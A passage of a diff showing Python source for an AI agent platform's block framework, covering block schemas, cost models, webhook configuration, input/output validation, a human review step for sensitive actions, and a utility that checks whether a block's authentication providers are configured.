||||||
|
AGENT = "Block that interacts with other agents."
|
||||||
|
CRM = "Block that interacts with CRM services."
|
||||||
|
SAFETY = (
|
||||||
|
"Block that provides AI safety mechanisms such as detecting harmful content"
|
||||||
|
)
|
||||||
|
PRODUCTIVITY = "Block that helps with productivity"
|
||||||
|
ISSUE_TRACKING = "Block that helps with issue tracking"
|
||||||
|
MULTIMEDIA = "Block that interacts with multimedia content"
|
||||||
|
MARKETING = "Block that helps with marketing"
|
||||||
|
|
||||||
|
def dict(self) -> dict[str, str]:
|
||||||
|
return {"category": self.name, "description": self.value}
|
||||||
|
|
||||||
|
|
||||||
|
class BlockCostType(str, Enum):
|
||||||
|
RUN = "run" # cost X credits per run
|
||||||
|
BYTE = "byte" # cost X credits per byte
|
||||||
|
SECOND = "second" # cost X credits per second
|
||||||
|
|
||||||
|
|
||||||
|
class BlockCost(BaseModel):
|
||||||
|
cost_amount: int
|
||||||
|
cost_filter: BlockInput
|
||||||
|
cost_type: BlockCostType
|
||||||
|
|
||||||
|
def __init__(
|
||||||
|
self,
|
||||||
|
cost_amount: int,
|
||||||
|
cost_type: BlockCostType = BlockCostType.RUN,
|
||||||
|
cost_filter: Optional[BlockInput] = None,
|
||||||
|
**data: Any,
|
||||||
|
) -> None:
|
||||||
|
super().__init__(
|
||||||
|
cost_amount=cost_amount,
|
||||||
|
cost_filter=cost_filter or {},
|
||||||
|
cost_type=cost_type,
|
||||||
|
**data,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
class BlockInfo(BaseModel):
|
||||||
|
id: str
|
||||||
|
name: str
|
||||||
|
inputSchema: dict[str, Any]
|
||||||
|
outputSchema: dict[str, Any]
|
||||||
|
costs: list[BlockCost]
|
||||||
|
description: str
|
||||||
|
categories: list[dict[str, str]]
|
||||||
|
contributors: list[dict[str, Any]]
|
||||||
|
staticOutput: bool
|
||||||
|
uiType: str
|
||||||
|
|
||||||
|
|
||||||
|
class BlockSchema(BaseModel):
|
||||||
|
cached_jsonschema: ClassVar[dict[str, Any]]
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def jsonschema(cls) -> dict[str, Any]:
|
||||||
|
if cls.cached_jsonschema:
|
||||||
|
return cls.cached_jsonschema
|
||||||
|
|
||||||
|
model = jsonref.replace_refs(cls.model_json_schema(), merge_props=True)
|
||||||
|
|
||||||
|
def ref_to_dict(obj):
|
||||||
|
if isinstance(obj, dict):
|
||||||
|
# OpenAPI <3.1 does not support sibling fields that has a $ref key
|
||||||
|
# So sometimes, the schema has an "allOf"/"anyOf"/"oneOf" with 1 item.
|
||||||
|
keys = {"allOf", "anyOf", "oneOf"}
|
||||||
|
one_key = next((k for k in keys if k in obj and len(obj[k]) == 1), None)
|
||||||
|
if one_key:
|
||||||
|
obj.update(obj[one_key][0])
|
||||||
|
|
||||||
|
return {
|
||||||
|
key: ref_to_dict(value)
|
||||||
|
for key, value in obj.items()
|
||||||
|
if not key.startswith("$") and key != one_key
|
||||||
|
}
|
||||||
|
elif isinstance(obj, list):
|
||||||
|
return [ref_to_dict(item) for item in obj]
|
||||||
|
|
||||||
|
return obj
|
||||||
|
|
||||||
|
cls.cached_jsonschema = cast(dict[str, Any], ref_to_dict(model))
|
||||||
|
|
||||||
|
return cls.cached_jsonschema
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def validate_data(cls, data: BlockInput) -> str | None:
|
||||||
|
return json.validate_with_jsonschema(
|
||||||
|
schema=cls.jsonschema(),
|
||||||
|
data={k: v for k, v in data.items() if v is not None},
|
||||||
|
)
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def get_mismatch_error(cls, data: BlockInput) -> str | None:
|
||||||
|
return cls.validate_data(data)
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def get_field_schema(cls, field_name: str) -> dict[str, Any]:
|
||||||
|
model_schema = cls.jsonschema().get("properties", {})
|
||||||
|
if not model_schema:
|
||||||
|
raise ValueError(f"Invalid model schema {cls}")
|
||||||
|
|
||||||
|
property_schema = model_schema.get(field_name)
|
||||||
|
if not property_schema:
|
||||||
|
raise ValueError(f"Invalid property name {field_name}")
|
||||||
|
|
||||||
|
return property_schema
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def validate_field(cls, field_name: str, data: BlockInput) -> str | None:
|
||||||
|
"""
|
||||||
|
Validate the data against a specific property (one of the input/output name).
|
||||||
|
Returns the validation error message if the data does not match the schema.
|
||||||
|
"""
|
||||||
|
try:
|
||||||
|
property_schema = cls.get_field_schema(field_name)
|
||||||
|
jsonschema.validate(json.to_dict(data), property_schema)
|
||||||
|
return None
|
||||||
|
except jsonschema.ValidationError as e:
|
||||||
|
return str(e)
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def get_fields(cls) -> set[str]:
|
||||||
|
return set(cls.model_fields.keys())
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def get_required_fields(cls) -> set[str]:
|
||||||
|
return {
|
||||||
|
field
|
||||||
|
for field, field_info in cls.model_fields.items()
|
||||||
|
if field_info.is_required()
|
||||||
|
}
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def __pydantic_init_subclass__(cls, **kwargs):
|
||||||
|
"""Validates the schema definition. Rules:
|
||||||
|
- Fields with annotation `CredentialsMetaInput` MUST be
|
||||||
|
named `credentials` or `*_credentials`
|
||||||
|
- Fields named `credentials` or `*_credentials` MUST be
|
||||||
|
of type `CredentialsMetaInput`
|
||||||
|
"""
|
||||||
|
super().__pydantic_init_subclass__(**kwargs)
|
||||||
|
|
||||||
|
# Reset cached JSON schema to prevent inheriting it from parent class
|
||||||
|
cls.cached_jsonschema = {}
|
||||||
|
|
||||||
|
credentials_fields = cls.get_credentials_fields()
|
||||||
|
|
||||||
|
for field_name in cls.get_fields():
|
||||||
|
if is_credentials_field_name(field_name):
|
||||||
|
if field_name not in credentials_fields:
|
||||||
|
raise TypeError(
|
||||||
|
f"Credentials field '{field_name}' on {cls.__qualname__} "
|
||||||
|
f"is not of type {CredentialsMetaInput.__name__}"
|
||||||
|
)
|
||||||
|
|
||||||
|
CredentialsMetaInput.validate_credentials_field_schema(
|
||||||
|
cls.get_field_schema(field_name), field_name
|
||||||
|
)
|
||||||
|
|
||||||
|
elif field_name in credentials_fields:
|
||||||
|
raise KeyError(
|
||||||
|
f"Credentials field '{field_name}' on {cls.__qualname__} "
|
||||||
|
"has invalid name: must be 'credentials' or *_credentials"
|
||||||
|
)
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def get_credentials_fields(cls) -> dict[str, type[CredentialsMetaInput]]:
|
||||||
|
return {
|
||||||
|
field_name: info.annotation
|
||||||
|
for field_name, info in cls.model_fields.items()
|
||||||
|
if (
|
||||||
|
inspect.isclass(info.annotation)
|
||||||
|
and issubclass(
|
||||||
|
get_origin(info.annotation) or info.annotation,
|
||||||
|
CredentialsMetaInput,
|
||||||
|
)
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def get_auto_credentials_fields(cls) -> dict[str, dict[str, Any]]:
|
||||||
|
"""
|
||||||
|
Get fields that have auto_credentials metadata (e.g., GoogleDriveFileInput).
|
||||||
|
|
||||||
|
Returns a dict mapping kwarg_name -> {field_name, auto_credentials_config}
|
||||||
|
|
||||||
|
Raises:
|
||||||
|
ValueError: If multiple fields have the same kwarg_name, as this would
|
||||||
|
cause silent overwriting and only the last field would be processed.
|
||||||
|
"""
|
||||||
|
result: dict[str, dict[str, Any]] = {}
|
||||||
|
schema = cls.jsonschema()
|
||||||
|
properties = schema.get("properties", {})
|
||||||
|
|
||||||
|
for field_name, field_schema in properties.items():
|
||||||
|
auto_creds = field_schema.get("auto_credentials")
|
||||||
|
if auto_creds:
|
||||||
|
kwarg_name = auto_creds.get("kwarg_name", "credentials")
|
||||||
|
if kwarg_name in result:
|
||||||
|
raise ValueError(
|
||||||
|
f"Duplicate auto_credentials kwarg_name '{kwarg_name}' "
|
||||||
|
f"in fields '{result[kwarg_name]['field_name']}' and "
|
||||||
|
f"'{field_name}' on {cls.__qualname__}"
|
||||||
|
)
|
||||||
|
result[kwarg_name] = {
|
||||||
|
"field_name": field_name,
|
||||||
|
"config": auto_creds,
|
||||||
|
}
|
||||||
|
return result
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def get_credentials_fields_info(cls) -> dict[str, CredentialsFieldInfo]:
|
||||||
|
result = {}
|
||||||
|
|
||||||
|
# Regular credentials fields
|
||||||
|
for field_name in cls.get_credentials_fields().keys():
|
||||||
|
result[field_name] = CredentialsFieldInfo.model_validate(
|
||||||
|
cls.get_field_schema(field_name), by_alias=True
|
||||||
|
)
|
||||||
|
|
||||||
|
# Auto-generated credentials fields (from GoogleDriveFileInput etc.)
|
||||||
|
for kwarg_name, info in cls.get_auto_credentials_fields().items():
|
||||||
|
config = info["config"]
|
||||||
|
# Build a schema-like dict that CredentialsFieldInfo can parse
|
||||||
|
auto_schema = {
|
||||||
|
"credentials_provider": [config.get("provider", "google")],
|
||||||
|
"credentials_types": [config.get("type", "oauth2")],
|
||||||
|
"credentials_scopes": config.get("scopes"),
|
||||||
|
}
|
||||||
|
result[kwarg_name] = CredentialsFieldInfo.model_validate(
|
||||||
|
auto_schema, by_alias=True
|
||||||
|
)
|
||||||
|
|
||||||
|
return result
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def get_input_defaults(cls, data: BlockInput) -> BlockInput:
|
||||||
|
return data # Return as is, by default.
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def get_missing_links(cls, data: BlockInput, links: list["Link"]) -> set[str]:
|
||||||
|
input_fields_from_nodes = {link.sink_name for link in links}
|
||||||
|
return input_fields_from_nodes - set(data)
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def get_missing_input(cls, data: BlockInput) -> set[str]:
|
||||||
|
return cls.get_required_fields() - set(data)
|
||||||
|
|
||||||
|
|
||||||
|
class BlockSchemaInput(BlockSchema):
|
||||||
|
"""
|
||||||
|
Base schema class for block inputs.
|
||||||
|
All block input schemas should extend this class for consistency.
|
||||||
|
"""
|
||||||
|
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
class BlockSchemaOutput(BlockSchema):
|
||||||
|
"""
|
||||||
|
Base schema class for block outputs that includes a standard error field.
|
||||||
|
All block output schemas should extend this class to ensure consistent error handling.
|
||||||
|
"""
|
||||||
|
|
||||||
|
error: str = SchemaField(
|
||||||
|
description="Error message if the operation failed", default=""
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
BlockSchemaInputType = TypeVar("BlockSchemaInputType", bound=BlockSchemaInput)
|
||||||
|
BlockSchemaOutputType = TypeVar("BlockSchemaOutputType", bound=BlockSchemaOutput)
|
||||||
|
|
||||||
|
|
||||||
|
class EmptyInputSchema(BlockSchemaInput):
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
class EmptyOutputSchema(BlockSchemaOutput):
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
# For backward compatibility - will be deprecated
|
||||||
|
EmptySchema = EmptyOutputSchema
|
||||||
|
|
||||||
|
|
||||||
|
# --8<-- [start:BlockWebhookConfig]
|
||||||
|
class BlockManualWebhookConfig(BaseModel):
|
||||||
|
"""
|
||||||
|
Configuration model for webhook-triggered blocks on which
|
||||||
|
the user has to manually set up the webhook at the provider.
|
||||||
|
"""
|
||||||
|
|
||||||
|
provider: ProviderName
|
||||||
|
"""The service provider that the webhook connects to"""
|
||||||
|
|
||||||
|
webhook_type: str
|
||||||
|
"""
|
||||||
|
Identifier for the webhook type. E.g. GitHub has repo and organization level hooks.
|
||||||
|
|
||||||
|
Only for use in the corresponding `WebhooksManager`.
|
||||||
|
"""
|
||||||
|
|
||||||
|
event_filter_input: str = ""
|
||||||
|
"""
|
||||||
|
Name of the block's event filter input.
|
||||||
|
Leave empty if the corresponding webhook doesn't have distinct event/payload types.
|
||||||
|
"""
|
||||||
|
|
||||||
|
event_format: str = "{event}"
|
||||||
|
"""
|
||||||
|
Template string for the event(s) that a block instance subscribes to.
|
||||||
|
Applied individually to each event selected in the event filter input.
|
||||||
|
|
||||||
|
Example: `"pull_request.{event}"` -> `"pull_request.opened"`
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
class BlockWebhookConfig(BlockManualWebhookConfig):
|
||||||
|
"""
|
||||||
|
Configuration model for webhook-triggered blocks for which
|
||||||
|
the webhook can be automatically set up through the provider's API.
|
||||||
|
"""
|
||||||
|
|
||||||
|
resource_format: str
|
||||||
|
"""
|
||||||
|
Template string for the resource that a block instance subscribes to.
|
||||||
|
Fields will be filled from the block's inputs (except `payload`).
|
||||||
|
|
||||||
|
Example: `f"{repo}/pull_requests"` (note: not how it's actually implemented)
|
||||||
|
|
||||||
|
Only for use in the corresponding `WebhooksManager`.
|
||||||
|
"""
|
||||||
|
# --8<-- [end:BlockWebhookConfig]
|
||||||
|
|
||||||
|
|
||||||
|
class Block(ABC, Generic[BlockSchemaInputType, BlockSchemaOutputType]):
|
||||||
|
def __init__(
|
||||||
|
self,
|
||||||
|
id: str = "",
|
||||||
|
description: str = "",
|
||||||
|
contributors: list["ContributorDetails"] = [],
|
||||||
|
categories: set[BlockCategory] | None = None,
|
||||||
|
input_schema: Type[BlockSchemaInputType] = EmptyInputSchema,
|
||||||
|
output_schema: Type[BlockSchemaOutputType] = EmptyOutputSchema,
|
||||||
|
test_input: BlockInput | list[BlockInput] | None = None,
|
||||||
|
test_output: BlockTestOutput | list[BlockTestOutput] | None = None,
|
||||||
|
test_mock: dict[str, Any] | None = None,
|
||||||
|
test_credentials: Optional[Credentials | dict[str, Credentials]] = None,
|
||||||
|
disabled: bool = False,
|
||||||
|
static_output: bool = False,
|
||||||
|
block_type: BlockType = BlockType.STANDARD,
|
||||||
|
webhook_config: Optional[BlockWebhookConfig | BlockManualWebhookConfig] = None,
|
||||||
|
is_sensitive_action: bool = False,
|
||||||
|
):
|
||||||
|
"""
|
||||||
|
Initialize the block with the given schema.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
id: The unique identifier for the block, this value will be persisted in the
|
||||||
|
DB. So it should be a unique and constant across the application run.
|
||||||
|
Use the UUID format for the ID.
|
||||||
|
description: The description of the block, explaining what the block does.
|
||||||
|
contributors: The list of contributors who contributed to the block.
|
||||||
|
input_schema: The schema, defined as a Pydantic model, for the input data.
|
||||||
|
output_schema: The schema, defined as a Pydantic model, for the output data.
|
||||||
|
test_input: The list or single sample input data for the block, for testing.
|
||||||
|
test_output: The list or single expected output if the test_input is run.
|
||||||
|
test_mock: function names on the block implementation to mock on test run.
|
||||||
|
disabled: If the block is disabled, it will not be available for execution.
|
||||||
|
static_output: Whether the output links of the block are static by default.
|
||||||
|
"""
|
||||||
|
from backend.data.model import NodeExecutionStats
|
||||||
|
|
||||||
|
self.id = id
|
||||||
|
self.input_schema = input_schema
|
||||||
|
self.output_schema = output_schema
|
||||||
|
self.test_input = test_input
|
||||||
|
self.test_output = test_output
|
||||||
|
self.test_mock = test_mock
|
||||||
|
self.test_credentials = test_credentials
|
||||||
|
self.description = description
|
||||||
|
self.categories = categories or set()
|
||||||
|
self.contributors = contributors or set()
|
||||||
|
self.disabled = disabled
|
||||||
|
self.static_output = static_output
|
||||||
|
self.block_type = block_type
|
||||||
|
self.webhook_config = webhook_config
|
||||||
|
self.is_sensitive_action = is_sensitive_action
|
||||||
|
self.execution_stats: "NodeExecutionStats" = NodeExecutionStats()
|
||||||
|
|
||||||
|
if self.webhook_config:
|
||||||
|
if isinstance(self.webhook_config, BlockWebhookConfig):
|
||||||
|
# Enforce presence of credentials field on auto-setup webhook blocks
|
||||||
|
if not (cred_fields := self.input_schema.get_credentials_fields()):
|
||||||
|
raise TypeError(
|
||||||
|
"credentials field is required on auto-setup webhook blocks"
|
||||||
|
)
|
||||||
|
# Disallow multiple credentials inputs on webhook blocks
|
||||||
|
elif len(cred_fields) > 1:
|
||||||
|
raise ValueError(
|
||||||
|
"Multiple credentials inputs not supported on webhook blocks"
|
||||||
|
)
|
||||||
|
|
||||||
|
self.block_type = BlockType.WEBHOOK
|
||||||
|
else:
|
||||||
|
self.block_type = BlockType.WEBHOOK_MANUAL
|
||||||
|
|
||||||
|
# Enforce shape of webhook event filter, if present
|
||||||
|
if self.webhook_config.event_filter_input:
|
||||||
|
event_filter_field = self.input_schema.model_fields[
|
||||||
|
self.webhook_config.event_filter_input
|
||||||
|
]
|
||||||
|
if not (
|
||||||
|
isinstance(event_filter_field.annotation, type)
|
||||||
|
and issubclass(event_filter_field.annotation, BaseModel)
|
||||||
|
and all(
|
||||||
|
field.annotation is bool
|
||||||
|
for field in event_filter_field.annotation.model_fields.values()
|
||||||
|
)
|
||||||
|
):
|
||||||
|
raise NotImplementedError(
|
||||||
|
f"{self.name} has an invalid webhook event selector: "
|
||||||
|
"field must be a BaseModel and all its fields must be boolean"
|
||||||
|
)
|
||||||
|
|
||||||
|
# Enforce presence of 'payload' input
|
||||||
|
if "payload" not in self.input_schema.model_fields:
|
||||||
|
raise TypeError(
|
||||||
|
f"{self.name} is webhook-triggered but has no 'payload' input"
|
||||||
|
)
|
||||||
|
|
||||||
|
# Disable webhook-triggered block if webhook functionality not available
|
||||||
|
if not app_config.platform_base_url:
|
||||||
|
self.disabled = True
|
||||||
|
|
||||||
|
@abstractmethod
|
||||||
|
async def run(self, input_data: BlockSchemaInputType, **kwargs) -> BlockOutput:
|
||||||
|
"""
|
||||||
|
Run the block with the given input data.
|
||||||
|
Args:
|
||||||
|
input_data: The input data with the structure of input_schema.
|
||||||
|
|
||||||
|
Kwargs: Currently 14/02/2025 these include
|
||||||
|
graph_id: The ID of the graph.
|
||||||
|
node_id: The ID of the node.
|
||||||
|
graph_exec_id: The ID of the graph execution.
|
||||||
|
node_exec_id: The ID of the node execution.
|
||||||
|
user_id: The ID of the user.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
A Generator that yields (output_name, output_data).
|
||||||
|
output_name: One of the output name defined in Block's output_schema.
|
||||||
|
output_data: The data for the output_name, matching the defined schema.
|
||||||
|
"""
|
||||||
|
# --- satisfy the type checker, never executed -------------
|
||||||
|
if False: # noqa: SIM115
|
||||||
|
yield "name", "value" # pyright: ignore[reportMissingYield]
|
||||||
|
raise NotImplementedError(f"{self.name} does not implement the run method.")
|
||||||
|
|
||||||
|
async def run_once(
|
||||||
|
self, input_data: BlockSchemaInputType, output: str, **kwargs
|
||||||
|
) -> Any:
|
||||||
|
async for item in self.run(input_data, **kwargs):
|
||||||
|
name, data = item
|
||||||
|
if name == output:
|
||||||
|
return data
|
||||||
|
raise ValueError(f"{self.name} did not produce any output for {output}")
|
||||||
|
|
||||||
|
def merge_stats(self, stats: "NodeExecutionStats") -> "NodeExecutionStats":
|
||||||
|
self.execution_stats += stats
|
||||||
|
return self.execution_stats
|
||||||
|
|
||||||
|
@property
|
||||||
|
def name(self):
|
||||||
|
return self.__class__.__name__
|
||||||
|
|
||||||
|
def to_dict(self):
|
||||||
|
return {
|
||||||
|
"id": self.id,
|
||||||
|
"name": self.name,
|
||||||
|
"inputSchema": self.input_schema.jsonschema(),
|
||||||
|
"outputSchema": self.output_schema.jsonschema(),
|
||||||
|
"description": self.description,
|
||||||
|
"categories": [category.dict() for category in self.categories],
|
||||||
|
"contributors": [
|
||||||
|
contributor.model_dump() for contributor in self.contributors
|
||||||
|
],
|
||||||
|
"staticOutput": self.static_output,
|
||||||
|
"uiType": self.block_type.value,
|
||||||
|
}
|
||||||
|
|
||||||
|
def get_info(self) -> BlockInfo:
|
||||||
|
from backend.data.credit import get_block_cost
|
||||||
|
|
||||||
|
return BlockInfo(
|
||||||
|
id=self.id,
|
||||||
|
name=self.name,
|
||||||
|
inputSchema=self.input_schema.jsonschema(),
|
||||||
|
outputSchema=self.output_schema.jsonschema(),
|
||||||
|
costs=get_block_cost(self),
|
||||||
|
description=self.description,
|
||||||
|
categories=[category.dict() for category in self.categories],
|
||||||
|
contributors=[
|
||||||
|
contributor.model_dump() for contributor in self.contributors
|
||||||
|
],
|
||||||
|
staticOutput=self.static_output,
|
||||||
|
uiType=self.block_type.value,
|
||||||
|
)
|
||||||
|
|
||||||
|
async def execute(self, input_data: BlockInput, **kwargs) -> BlockOutput:
|
||||||
|
try:
|
||||||
|
async for output_name, output_data in self._execute(input_data, **kwargs):
|
||||||
|
yield output_name, output_data
|
||||||
|
except Exception as ex:
|
||||||
|
if isinstance(ex, BlockError):
|
||||||
|
raise ex
|
||||||
|
else:
|
||||||
|
raise (
|
||||||
|
BlockExecutionError
|
||||||
|
if isinstance(ex, ValueError)
|
||||||
|
else BlockUnknownError
|
||||||
|
)(
|
||||||
|
message=str(ex),
|
||||||
|
block_name=self.name,
|
||||||
|
block_id=self.id,
|
||||||
|
) from ex
|
||||||
|
|
||||||
|
async def is_block_exec_need_review(
|
||||||
|
self,
|
||||||
|
input_data: BlockInput,
|
||||||
|
*,
|
||||||
|
user_id: str,
|
||||||
|
node_id: str,
|
||||||
|
node_exec_id: str,
|
||||||
|
graph_exec_id: str,
|
||||||
|
graph_id: str,
|
||||||
|
graph_version: int,
|
||||||
|
execution_context: "ExecutionContext",
|
||||||
|
**kwargs,
|
||||||
|
) -> tuple[bool, BlockInput]:
|
||||||
|
"""
|
||||||
|
Check if this block execution needs human review and handle the review process.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Tuple of (should_pause, input_data_to_use)
|
||||||
|
- should_pause: True if execution should be paused for review
|
||||||
|
- input_data_to_use: The input data to use (may be modified by reviewer)
|
||||||
|
"""
|
||||||
|
if not (
|
||||||
|
self.is_sensitive_action and execution_context.sensitive_action_safe_mode
|
||||||
|
):
|
||||||
|
return False, input_data
|
||||||
|
|
||||||
|
from backend.blocks.helpers.review import HITLReviewHelper
|
||||||
|
|
||||||
|
# Handle the review request and get decision
|
||||||
|
decision = await HITLReviewHelper.handle_review_decision(
|
||||||
|
input_data=input_data,
|
||||||
|
user_id=user_id,
|
||||||
|
node_id=node_id,
|
||||||
|
node_exec_id=node_exec_id,
|
||||||
|
graph_exec_id=graph_exec_id,
|
||||||
|
graph_id=graph_id,
|
||||||
|
graph_version=graph_version,
|
||||||
|
block_name=self.name,
|
||||||
|
editable=True,
|
||||||
|
)
|
||||||
|
|
||||||
|
if decision is None:
|
||||||
|
# We're awaiting review - pause execution
|
||||||
|
return True, input_data
|
||||||
|
|
||||||
|
if not decision.should_proceed:
|
||||||
|
# Review was rejected, raise an error to stop execution
|
||||||
|
raise BlockExecutionError(
|
||||||
|
message=f"Block execution rejected by reviewer: {decision.message}",
|
||||||
|
block_name=self.name,
|
||||||
|
block_id=self.id,
|
||||||
|
)
|
||||||
|
|
||||||
|
# Review was approved - use the potentially modified data
|
||||||
|
# ReviewResult.data must be a dict for block inputs
|
||||||
|
reviewed_data = decision.review_result.data
|
||||||
|
if not isinstance(reviewed_data, dict):
|
||||||
|
raise BlockExecutionError(
|
||||||
|
message=f"Review data must be a dict for block input, got {type(reviewed_data).__name__}",
|
||||||
|
block_name=self.name,
|
||||||
|
block_id=self.id,
|
||||||
|
)
|
||||||
|
return False, reviewed_data
|
||||||
|
|
||||||
|
async def _execute(self, input_data: BlockInput, **kwargs) -> BlockOutput:
|
||||||
|
# Check for review requirement only if running within a graph execution context
|
||||||
|
# Direct block execution (e.g., from chat) skips the review process
|
||||||
|
has_graph_context = all(
|
||||||
|
key in kwargs
|
||||||
|
for key in (
|
||||||
|
"node_exec_id",
|
||||||
|
"graph_exec_id",
|
||||||
|
"graph_id",
|
||||||
|
"execution_context",
|
||||||
|
)
|
||||||
|
)
|
||||||
|
if has_graph_context:
|
||||||
|
should_pause, input_data = await self.is_block_exec_need_review(
|
||||||
|
input_data, **kwargs
|
||||||
|
)
|
||||||
|
if should_pause:
|
||||||
|
return
|
||||||
|
|
||||||
|
# Validate the input data (original or reviewer-modified) once
|
||||||
|
if error := self.input_schema.validate_data(input_data):
|
||||||
|
raise BlockInputError(
|
||||||
|
message=f"Unable to execute block with invalid input data: {error}",
|
||||||
|
block_name=self.name,
|
||||||
|
block_id=self.id,
|
||||||
|
)
|
||||||
|
|
||||||
|
# Use the validated input data
|
||||||
|
async for output_name, output_data in self.run(
|
||||||
|
self.input_schema(**{k: v for k, v in input_data.items() if v is not None}),
|
||||||
|
**kwargs,
|
||||||
|
):
|
||||||
|
if output_name == "error":
|
||||||
|
raise BlockExecutionError(
|
||||||
|
message=output_data, block_name=self.name, block_id=self.id
|
||||||
|
)
|
||||||
|
if self.block_type == BlockType.STANDARD and (
|
||||||
|
error := self.output_schema.validate_field(output_name, output_data)
|
||||||
|
):
|
||||||
|
raise BlockOutputError(
|
||||||
|
message=f"Block produced an invalid output data: {error}",
|
||||||
|
block_name=self.name,
|
||||||
|
block_id=self.id,
|
||||||
|
)
|
||||||
|
yield output_name, output_data
|
||||||
|
|
||||||
|
def is_triggered_by_event_type(
|
||||||
|
self, trigger_config: dict[str, Any], event_type: str
|
||||||
|
) -> bool:
|
||||||
|
if not self.webhook_config:
|
||||||
|
raise TypeError("This method can't be used on non-trigger blocks")
|
||||||
|
if not self.webhook_config.event_filter_input:
|
||||||
|
return True
|
||||||
|
event_filter = trigger_config.get(self.webhook_config.event_filter_input)
|
||||||
|
if not event_filter:
|
||||||
|
raise ValueError("Event filter is not configured on trigger")
|
||||||
|
return event_type in [
|
||||||
|
self.webhook_config.event_format.format(event=k)
|
||||||
|
for k in event_filter
|
||||||
|
if event_filter[k] is True
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
|
# Type alias for any block with standard input/output schemas
|
||||||
|
AnyBlockSchema: TypeAlias = Block[BlockSchemaInput, BlockSchemaOutput]
|
||||||
122
autogpt_platform/backend/backend/blocks/_utils.py
Normal file
122
autogpt_platform/backend/backend/blocks/_utils.py
Normal file
@@ -0,0 +1,122 @@
|
|||||||
|
import logging
|
||||||
|
import os
|
||||||
|
|
||||||
|
from backend.integrations.providers import ProviderName
|
||||||
|
|
||||||
|
from ._base import AnyBlockSchema
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
def is_block_auth_configured(
|
||||||
|
block_cls: type[AnyBlockSchema],
|
||||||
|
) -> bool:
|
||||||
|
"""
|
||||||
|
Check if a block has a valid authentication method configured at runtime.
|
||||||
|
|
||||||
|
For example if a block is an OAuth-only block and there env vars are not set,
|
||||||
|
do not show it in the UI.
|
||||||
|
|
||||||
|
"""
|
||||||
|
from backend.sdk.registry import AutoRegistry
|
||||||
|
|
||||||
|
# Create an instance to access input_schema
|
||||||
|
try:
|
||||||
|
block = block_cls()
|
||||||
|
except Exception as e:
|
||||||
|
# If we can't create a block instance, assume it's not OAuth-only
|
||||||
|
logger.error(f"Error creating block instance for {block_cls.__name__}: {e}")
|
||||||
|
return True
|
||||||
|
logger.debug(
|
||||||
|
f"Checking if block {block_cls.__name__} has a valid provider configured"
|
||||||
|
)
|
||||||
|
|
||||||
|
# Get all credential inputs from input schema
|
||||||
|
credential_inputs = block.input_schema.get_credentials_fields_info()
|
||||||
|
required_inputs = block.input_schema.get_required_fields()
|
||||||
|
if not credential_inputs:
|
||||||
|
logger.debug(
|
||||||
|
f"Block {block_cls.__name__} has no credential inputs - Treating as valid"
|
||||||
|
)
|
||||||
|
return True
|
||||||
|
|
||||||
|
# Check credential inputs
|
||||||
|
if len(required_inputs.intersection(credential_inputs.keys())) == 0:
|
||||||
|
logger.debug(
|
||||||
|
f"Block {block_cls.__name__} has only optional credential inputs"
|
||||||
|
" - will work without credentials configured"
|
||||||
|
)
|
||||||
|
|
||||||
|
# Check if the credential inputs for this block are correctly configured
|
||||||
|
for field_name, field_info in credential_inputs.items():
|
||||||
|
provider_names = field_info.provider
|
||||||
|
if not provider_names:
|
||||||
|
logger.warning(
|
||||||
|
f"Block {block_cls.__name__} "
|
||||||
|
f"has credential input '{field_name}' with no provider options"
|
||||||
|
" - Disabling"
|
||||||
|
)
|
||||||
|
return False
|
||||||
|
|
||||||
|
# If a field has multiple possible providers, each one needs to be usable to
|
||||||
|
# prevent breaking the UX
|
||||||
|
for _provider_name in provider_names:
|
||||||
|
provider_name = _provider_name.value
|
||||||
|
if provider_name in ProviderName.__members__.values():
|
||||||
|
logger.debug(
|
||||||
|
f"Block {block_cls.__name__} credential input '{field_name}' "
|
||||||
|
f"provider '{provider_name}' is part of the legacy provider system"
|
||||||
|
" - Treating as valid"
|
||||||
|
)
|
||||||
|
break
|
||||||
|
|
||||||
|
provider = AutoRegistry.get_provider(provider_name)
|
||||||
|
if not provider:
|
||||||
|
logger.warning(
|
||||||
|
f"Block {block_cls.__name__} credential input '{field_name}' "
|
||||||
|
f"refers to unknown provider '{provider_name}' - Disabling"
|
||||||
|
)
|
||||||
|
return False
|
||||||
|
|
||||||
|
# Check the provider's supported auth types
|
||||||
|
if field_info.supported_types != provider.supported_auth_types:
|
||||||
|
logger.warning(
|
||||||
|
f"Block {block_cls.__name__} credential input '{field_name}' "
|
||||||
|
f"has mismatched supported auth types (field <> Provider): "
|
||||||
|
f"{field_info.supported_types} != {provider.supported_auth_types}"
|
||||||
|
)
|
||||||
|
|
||||||
|
if not (supported_auth_types := provider.supported_auth_types):
|
||||||
|
# No auth methods are been configured for this provider
|
||||||
|
logger.warning(
|
||||||
|
f"Block {block_cls.__name__} credential input '{field_name}' "
|
||||||
|
f"provider '{provider_name}' "
|
||||||
|
"has no authentication methods configured - Disabling"
|
||||||
|
)
|
||||||
|
return False
|
||||||
|
|
||||||
|
# Check if provider supports OAuth
|
||||||
|
if "oauth2" in supported_auth_types:
|
||||||
|
# Check if OAuth environment variables are set
|
||||||
|
